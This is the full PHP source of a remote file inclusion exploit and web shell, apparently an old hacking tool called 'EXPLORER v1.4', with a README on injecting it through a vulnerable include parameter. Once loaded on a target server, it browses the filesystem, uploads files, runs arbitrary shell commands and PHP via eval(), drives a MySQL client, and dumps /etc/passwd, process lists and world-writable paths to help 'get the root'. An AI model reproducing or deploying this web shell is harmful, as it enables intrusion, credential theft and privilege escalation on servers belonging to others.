<?
$site="http://membres.lycos.fr/newbie2323/explorerv1_5.txt"; // Where this exploit is located. e.g.: [url]www.dumbman.com/lolage/file.txt[/url] but it can be called by an unexplicit file url or file extension. Modify it as necessary
if(!$variable){
$variable="page"; // Inclusion variable from the vulnerable site. E.g. : http://vulnerable_site/wall.php?page=index.htm, here the page is the variable used for inclusion. Modify it as necessary.
}
/* EXPLORER v1.4 - Modified - GET THE ROOT !
------------------------
PHP include vulnerability exploit for exploring purposes... Hum, no, sorry. For TESTING pruposes ONLY.
Version : 1.4 - Modified version
Original version by : LostNoobs, [url]www.security-challenge.com[/url]
Modified by : Clad Strife
France
------------------------
This exploit allows you to :
- Browse the server Hard Disk
- Upload files on the server
- Execute Unix or DOS commands
- Execute PHP
What is new with this modified version :
- Scan for non-protected files or repertories on which you could write. Only for UNIX type servers.
- MySQL communication interface.
- Usual UNIX system commands interface to make easier a system overview
- Exploit rewritten in english
- Exploit has a better look and feel
To come :
- Backdoor creation on the server
- Scan of vulnerable files with include vulnerability
------ README :
E.g. :
http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt
More :
http://www.vulnerable_site.com is the vulnerable site
http://www.site_faillible.com/include.php?page=variable is the webpage from where the include function is. If include.php contains a include($page.".txt"); that means it includes only files finishing by the .txt extension, so you have to rename your file consequently.
http://www.mysite.com this is your site
http://www.mysite.com/explorer.txt (or any other extension) The address where this exploit is located.
You have to modify the script to make it work properly.
Now your script should be ready for action. Try it by using : http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt
*/
$view_readme = 1; // Set to 1 if you checked the readme.
if($view_readme == 0)
{
printf("You should look at the README written inside this exploit if you want to unlock it !");
exit;
}
# Here the exploit code begins !
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=upload&variable='.$variable.'" > Upload a file.</a><br><br> ');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=explfopen&variable='.$variable.'" > Explore with fopen() function.</a><br><br>');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execphp&variable='.$variable.'" > Execute arbitrary PHP functions.</a><br><br>');
if(system("echo '<font color=red >PHP system() function is working properly. The following features should work :</font>'"))
{
echo(' <br><br><a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=system&variable='.$variable.'" > Execute a system() command.</a><br><br>');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execsql&variable='.$variable.'">
Manager for SQL Server</a><br><br>');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'">System overviewer (get the root !)</a><br><br>');
}
echo('<font size=-2>Include Exploit v1.4 - modified<br>Original authors : LostNoobs.<br>Modified by : Clad Strife.</font>');
###
#
# (New feature) SQL Manager
#
###
if($option=="execsql")
{
// A little about this feature.
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execsql&variable=".$variable."\" METHOD=POST><hr><br><br>
From here you can try to manage a local or remote mysqld server. If you have some logins and pass to try on the SQL Server, then you can start from here.<bR><br>
In fact you could also use system() to exec the local mysql client, but the command line is getting too large and not easily rewritable by this way. This is why I made this query manager.<br><br>
You need to have valid username/password to get into a local or remote database. To remote one you could be filtered, so don't get nervous about connection errors. Notice that this feature doesn't use the common mysql PHP functions, because the vulnerable page on which you make this exploit be browsable could crate some problems. It uses the common mysql client on *nix systems. The delay execution time of the client should be short enough to don't be discovered.
");
// Here starts the manager :
echo("
<br><br><hr><br><br>
Enter the name of the mysql client binary (default : mysql):<br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">
<br><br>Enter the login (default : root, but you can change it):<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">
<br><br>Enter the password (\"none\" is only if no password is needed): <br>
<input name=\"sql_password\" type=\"text\" value=\"none\">
<br><br>Enter address of target. \"localhost\" is maybe what you are searching for. Check for 127.0.0.1 if it doesn't work. Enter a valid IP address or hostname for remote connection :<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">
<bR><br>Enter any other facultative options for mysql client. This feature is only designed to set more sql client options. E.g. : if you want to connect on a specific port you will have to write : \"--port=3306\". If you are unusure of what to do, leave it blank :<br>
<input name=\"sql_options\" type=\"text\" value=\"\">
<br><br>Enter valid SQL queries. You can try \"SHOW DATABASES;\" first (default) and then exec command as \"USE BASE1; SHOW TABLES;\". You can edit on multiple lines :<br>
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>
<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>
");
}
if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : $system_cmd :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------
");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // End of else if for no password option
else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : $system_cmd :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------
");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // end of else
} // end of if
###
#
# (New feature) System overview utility
#
###
if($option=="overview")
{
echo('<br><br><hr><br>From here you will be able to execute many predefined commands which gather informations about the system itself. This has been designed to make an easier way to catch the root account. GET THE ROOT ! Wh00h00 !!<br><br>More you choose commands to be executed, more you have to expect a long loading time. Do not be worry if the webpage is still hanging. Anyway some specific UNIX commands may not work properly, because the command options in this file are designed for GNU/LINUX systems.<br><br><hr><br><br>');
echo('
<FORM ENCTYPE="multipart/form-data" ACTION="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'" METHOD=POST>
About processes :<br>
<INPUT TYPE="checkbox" name="procroot" VALUE="y"> What the are the processes executed by the root ?<br>
<INPUT TYPE="checkbox" name="procall" VALUE="y"> What are all running processes ?<br><br><br>
About the system :<br>
<INPUT TYPE="checkbox" name="uname" VALUE="y"> Print certain system information.<br>
<INPUT TYPE="checkbox" name="catversion" VALUE="y"> What is the kernel version ?<br>
<INPUT TYPE="checkbox" name="mount" VALUE="y"> Where are the mounted filesystems ?<br>
<INPUT TYPE="checkbox" name="id" VALUE="y"> Which user is running this httpd server ?<br>
<INPUT TYPE="checkbox" name="who" VALUE="y"> Who is currently connected to the system ?<br>
<INPUT TYPE="checkbox" name="last" VALUE="y"> Give me the logins and hostnames of all last connected users.<br>
<INPUT TYPE="checkbox" name="modules" VALUE="y"> What are the running modules ?<br>
<INPUT TYPE="checkbox" name="hardware" VALUE="y"> Collect about Hardware (is it really useful ?)<br>
<INPUT TYPE="checkbox" name="network" VALUE="y"> Extract the network configuration<br>
<br>Collect data in files :<br>
<INPUT TYPE="radio" name="passwd" value="yfull"> Get all the /etc/passwd.<br>
<INPUT TYPE="radio" name="passwd" value="yshell"> Grab only users with a shell access.<br>
<INPUT TYPE="checkbox" name="group" value="y"> What are the available groups ?<br>
<INPUT TYPE="checkbox" name="resolv" value="y"> What are the DNS used by this server ?<br><br>
Miscellaneous :<br>
<INPUT TYPE="radio" name="bcheck" value="big"> BIG CHECK<br>
It checks for non write-protected files. This feature may slow the page loading, and sometimes so much that it is not possible to continue. Try for the small check first before trying this one.<br>
<INPUT TYPE="radio" name="bcheck" value="small"> SMALL CHECK<br>
It checks for non-write protected files in /tmp and /home only. May not be exhaustive.<br>
<INPUT TYPE="checkbox" name="dirs" value="y"> + DIRECTORIES<br>
This checks for non-protected directories. This feature will only be used with a SMALL or BIG CHECK. Anyway it increases the global search time.<br><br>
<INPUT TYPE="submit" name="Submit" Value="Nuke !"></form><br><br><hr>');
if($Submit)
{
echo ('<br><TEXTAREA COLS=110 ROWS=40>Text output for all selected options. First you got the command processed, and next you read its output.
----------------------------------------------------------------------------->
');
// Here will start the output for each selected command.
///////////////////
if($procroot)
{
echo('
Processes launched by the root :
ps aux | grep root
--------------------------------
');
system("ps aux | grep root",$var);
if($var != 0){
echo("failed");}
}
//////////////////
//////////////////
if($procall)
{
echo('
Processes currently running :
ps aux
-----------------------------
');
system("ps aux",$var);
if($var != 0){
echo("failed");}
//////////////////
}
//////////////////
if($uname)
{
echo('
Certain system information :
uname -a
----------------------------
');
system("uname -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($catversion)
{
echo('
Kernel version :
cat /proc/version
-----------------
');
system("cat /proc/version",$var);
if($var != 0){
echo("failed");}
}
/////////////////
/////////////////
if($mount)
{
echo('
Show the mounted partitions :
mount
-----------------------------
');
system("mount",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($id)
{
echo('
Which user is running this server :
id
-----------------------------------
');
system("id",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($who)
{
echo('
Who is connected :
who
------------------
');
system("who",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($last)
{
echo('
Who are the last connected users :
last -a
----------------------------------
');
system("last -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($modules)
{
echo('
Running modules :
cat /proc/modules
-----------------
');
system("cat /proc/modules",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($hardware)
{
echo('
About Hardware :
cat /proc/cpuinfo
-----------------
');
system("cat /proc/cpuinfo",$var);
if($var != 0){
echo("failed");}
echo('
About Hardware :
cat /proc/pci
----------------
');
system("cat /proc/pci",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($network)
{
echo('
Network configuration :
ifconfig -a
-----------------------
');
system("ifconfig -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($passwd == "yfull")
{
echo('
Whole /etc/passwd :
cat /etc/passwd
-------------------
');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($passwd == "yshell")
{
echo('
Current account with a shell :
cat /etc/passwd | grep /bin/sh ;
cat /etc/passwd | grep /bin/bash ;
cat /etc/passwd | grep /bin/tcsh ;
----------------------------------
');
system("cat /etc/passwd | grep /bin/sh ; cat /etc/passwd | grep /bin/bash ; cat /etc/passwd | grep /bin/tcsh;true",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($passwd == "yfull")
{
echo('
Full /etc/passwd :
cat /etc/passwd
-----------------
');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($group)
{
echo('
Current groups :
cat /etc/group
-----------------
');
system("cat /etc/group",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($resolv)
{
echo('
DNS used for resolution :
cat /etc/resolv.conf
-------------------------
');
system("cat /etc/resolv.conf",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($bcheck == "big")
{
echo('
Non-protected files on the whole system :
find / -type f -perm 777
-----------------------------------------
');
system("find / -type f -perm 777",$var);
if($var != 0){
echo("failed");}
if($dirs) //may also check for non protected directories
{
echo('
Non-protected directories on the whole system :
find / -type d -perm 777
-----------------------------------------------
');
system("find / -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}
}
//////////////////
/////////////////
if($bcheck == "small")
{
echo('
Non-protected files on /tmp and /home :
find /home -type f -perm 777;
find /tmp -type f -perm 777
---------------------------------------
');
system("find /home -type f -perm 777 ; find /tmp -type f -perm 777",$var);
if($var != 0){
echo("failed");}
if($dirs) //may also check for non protected directories
{
echo('
Non-protected directories on /home and /tmp :
find /home -type d -perm 777;
find /home -type d -perm 777
---------------------------------------------
');
system("find /home -type d -perm 777 ; find /tmp -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}
}
//////////////////
echo('
End of report.
</TEXTAREA><br>');
} // end of if($Submit)
} // end of if option = overview
###
#
# PHP Execution part ------------------------
#
###
if($option=="execphp"){
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execphp&variable=".$variable."\" METHOD=POST><hr><br><br>
Edit PHP code to execute. (e.g.: phpinfo(); echo(\"toto\"); ):<br>
<TEXTAREA input name=\"cmd0\" ROWS=15 COLS=50></TEXTAREA>
<br><br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">
</font>
</form>
");
if($cmd0){
$cmd0=str_replace("\\\"","\"",$cmd0);
$cmd0=str_replace("\\'","'",$cmd0);
echo("<br><br><hr><br><br>\"$cmd0\" results :<br><br>");
eval($cmd0);
echo("<br><br><hr><br><br>");
}
}
###
#
# System command part -----------------
#
###
if($option=="system"){
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=system&variable=".$variable."\" METHOD=POST><hr><br><bR>
Choose a system command to execute with system() function :
<br>
<input name=\"cmd\" type=\"text\" value=\"\" size=40>
<br>
<br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">
</font>
</form>
");
if($cmd){
$cmd=str_replace("\\\"","\"",$cmd);
$cmd=str_replace("\\'","'",$cmd);
echo("<br><br><hr><br><br>Results for command $cmd :<br><br>");
echo "<form><textarea cols=100 rows=40>\"$cmd\" results :
-----------------------------------------
";
system($cmd,$var); // Output command in the textarea
if($var != 0){
system($cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo "</textarea></form>";
}
echo("<br><br><hr><br><br><br>");
}
###
#
# Upload part ------------------
#
###
if($option=="upload"){
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=upload&variable=".$variable."\" METHOD=POST><hr><br><br>
Choose the file on your computer that you want to upload :<br>
<input name=\"FileName\" type=\"FILE\" value=\"\" size=70>
<br><br>
Choose the remote location where you want the file to be stored. Provide a path ending with the file name (e.g. : /tmp/.myfile) :<br>
<input name=\"path\" type=\"text\" value=\"\" size=70>
<br>
<br>
<input type=\"SUBMIT\" value=\"Upload it !\" name=\"SUBMIT\">
</font>
</form>
");
if($FileName){
if ( !copy($FileName, $path)){
print("<br><br><hr><br><br>The upload of $FileName in $path failed...<br>\n");
}else{
echo("<br><br><hr><br><br>Upload Successfull !");
}
}
}
###
#
# Explorer part --------------------
#
###
if($option=="explfopen"){
function output( $mode )
{
if( $mode & 0x1000 )
$type='p'; /* FIFO pipe */
else if( $mode & 0x2000 )
$type='c'; /* Character special */
else if( $mode & 0x4000 )
$type='d'; /* Directory */
else if( $mode & 0x6000 )
$type='b'; /* Block special */
else if( $mode & 0x8000 )
$type='-'; /* Regular */
else if( $mode & 0xA000 )
$type='l'; /* Symbolic Link */
else if( $mode & 0xC000 )
$type='s'; /* Socket */
else
$type='u'; /* UNKNOWN */
/* Determine permissions */
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
/* Adjust for SUID, SGID and sticky bit */
if( $mode & 0x800 )
$owner["execute"] = ($owner[execute]=='x') ? 's' : 'S';
if( $mode & 0x400 )
$group["execute"] = ($group[execute]=='x') ? 's' : 'S';
if( $mode & 0x200 )
$world["execute"] = ($world[execute]=='x') ? 't' : 'T';
printf("%1s", $type);
printf("%1s%1s%1s", $owner[read], $owner[write], $owner[execute]);
printf("%1s%1s%1s", $group[read], $group[write], $group[execute]);
printf("%1s%1s%1s\n", $world[read], $world[write], $world[execute]);
}
if($fichier)
{
echo "<form><textarea cols=100 rows=40>";
$fp = fopen ($rep."/".$fichier, "r");
$i=1;
while (!feof($fp))
{
$buffer=fgets($fp,4096);
$buffer=str_replace(chr(10),"",$buffer);
$buffer=str_replace(chr(13),"",$buffer);
echo $buffer."\n";
}
fclose ($fp);
echo "</textarea></form>";
}
else {
if(!$rep)
$rep="./"; // initial path location
echo("<br><br><hr><br><br>");
if($rep == "./../../../../../../../../../../../../")
{
echo("You are in the root FileSystem.<br><br>");
}
$directory = opendir($rep);
while ($entree = readdir($directory)) {
if ($entree != "." && $entree != "..")
$tFichiers[] = filemtime($rep.$entree)."?".$entree."?".is_file($rep.$entree)."?".fileowner($rep.$entree);
}
closedir($directory);
rsort($tFichiers);
for ($cpt = 0; $cpt < sizeof($tFichiers); $cpt++) {
$tVals = explode("?", $tFichiers[$cpt]);
if($tVals[2]==0)
{
$link=$rep.$tVals[1]."/";
echo "[".date("Y-m-d H:i",$tVals[0])."] <a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a><BR>\n";
}
else{
$link=$rep."&fichier=".$tVals[1];
output(fileperms($rep.$entree));
echo "[".date("Y-m-d H:i",$tVals[0])."] <a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a> $tVals[3]<BR>\n"; }
}
}
}
?>
